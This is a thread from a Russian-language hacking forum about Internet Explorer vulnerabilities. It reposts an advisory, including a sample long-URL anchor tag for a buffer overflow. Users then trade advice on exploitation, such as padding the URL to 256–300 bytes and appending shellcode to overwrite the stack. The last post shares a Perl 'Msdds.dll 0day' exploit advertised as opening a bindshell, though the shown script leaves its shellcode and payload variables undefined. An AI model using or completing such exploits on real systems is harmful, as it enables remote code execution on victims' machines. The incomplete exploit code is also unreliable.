• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимость в Ie

n1†R0x

CPU register
Пользователь
Регистрация
02.04.2005
Сообщения
1 594
Реакции
3
Множественные уязвимости в Internet Explorer (обновлено)
Программа: Microsoft Internet Explorer 5.01, 5.5, 6

Опасность: Критическая

Наличие эксплоита: Нет

Описание:
Уязвимости позволяют удаленному пользователю выполнить произвольный код на системе с привилегиями процесса.

1. Уязвимость состояния операции существует при обработке DHTML методов createElement(), appendChild(), и removeNode().Удачная эксплуатация уязвимости позволит удаленному пользователю выполнить произвольный код на целевой системе с привилегиями уязвимого процесса.

2. Уязвимость существует в функции InternetCreateUrlW при обработке длинных URL (более 256 символов). Удаленный пользователь может с помощью специально сформированной web страницы выполнить произвольный код на целевой системе с привилегиями текущего пользователя. Пример:

<a href='http://<buffer_of_256-300_bytes>/'>TEST (CLICK)</a>

3. Уязвимость при обработке рейтингов Content Advisor позволяет удаленному пользователю выполнить произвольный код на целевой системе.

URL производителя: www.microsoft.com

Решение: Установите обновления от производителя.
 
Сам я не разбирался, скажу, как думаю...
1. Тут недостаточно данных для использования уязвимости, надо посмотреть в справочнике, что это за "createElement()" "appendChild()" "removeNode()"
Или в учебнике каком. Сам бы посмотрел - времени нет...
2. У каждого браузера есть буфер URL то есть скока символов сможет браузер распознать в адресе. Нам надо, чтоб адрес был в диапазоне от 256 до 300 символов, ну а Test Click - пример целевого кода.
3. Об этих рейтингах лучше в инете почитать, не знаю, что это. Вроде как ограничения по контенту... хз.
Напомню, что эти уязвимости действуют ТОЛЬКО в ИЕ и я сказал СВОЕ мнение по поводу уязвимостей, как я их понимаю, если кто-то знает лучше, расскажите...
 
Уязвимости позволяют удаленному пользователю выполнить произвольный код на системе с привилегиями процесса. == всем должно быть понятно.

Уязвимость состояния операции существует при обработке DHTML методов createElement(), appendChild(), и removeNode().Удачная эксплуатация уязвимости позволит удаленному пользователю выполнить произвольный код на целевой системе с привилегиями уязвимого процесса. == DHTML динамический хтмл. Логически помыслив можно догадаться что дляиспользования уязвимости надо создать динамическую пагу которая будет использовать вражеские функции (в нашем случае создание элемента(например формы или всплывающего меню)) Добиться эксплуатации можно только одним способом.=
Вооружаться инструментами крякеров(отладчик итп.) И рыть исходник.
Сплоитбудет сделать довольно сложно. И если кто-нибудь это сделает это то уж врятли даст вам рабочий сплоит.


2)
<a href='http://<buffer_of_256-300_bytes>/'>TEST (CLICK)</a> - тут ничего сложного для опытного человека.
1) Пишите охинею длинной от 256 до 300 символов
2) Далее шелл код который должен затереть соседнюю область памяти в стеке.

3. Уязвимость при обработке рейтингов Content Advisor позволяет удаленному пользователю выполнить произвольный код на целевой системе. = эксплуатировать не реально, т.к. это уже какие-то лишние замарочки от микрософта.
================================================
Кстати я вернулся

:) :) :)
 
Хо-хо. В ослике опять баг. На этот раз эксплоит позволит выполнить произвольный код на удаленной машине. Как шаблонно звучит :huh: ...
Ну чтож, сплойт на перле, компилить ненада. Вот оно:
Код:
#!/usr/bin/perl
#######################################################
#
# Microsoft Internet Explorer "Msdds.dll" Remote Code Execution Exploit (0day)
#
# Bindshell on port 28876 - Vulnerability discovered and exploited by Anonymous
#
# PoC code ripped from Berend-Jan Wever's Internet-Exploiter
#
# Vulnerable : EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F (Msdds.dll)
#
# Tested on : Microsoft Internet Explorer 6 SP2 (Windows XP SP2)
#
# Code usage : perl IE-Msddsdll-0day.pl > mypage.html
#
#######################################################
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2, 1991 as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
#######################################################

# header
my $header = "

";

# Msdds.dll
my $clsid = 'EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F';

# footer
my $footer = "
".
"Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit
";

# print "Content-Type: text/html;

"; # if you are in cgi-bin
print "$header $shellcode $code $footer";
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх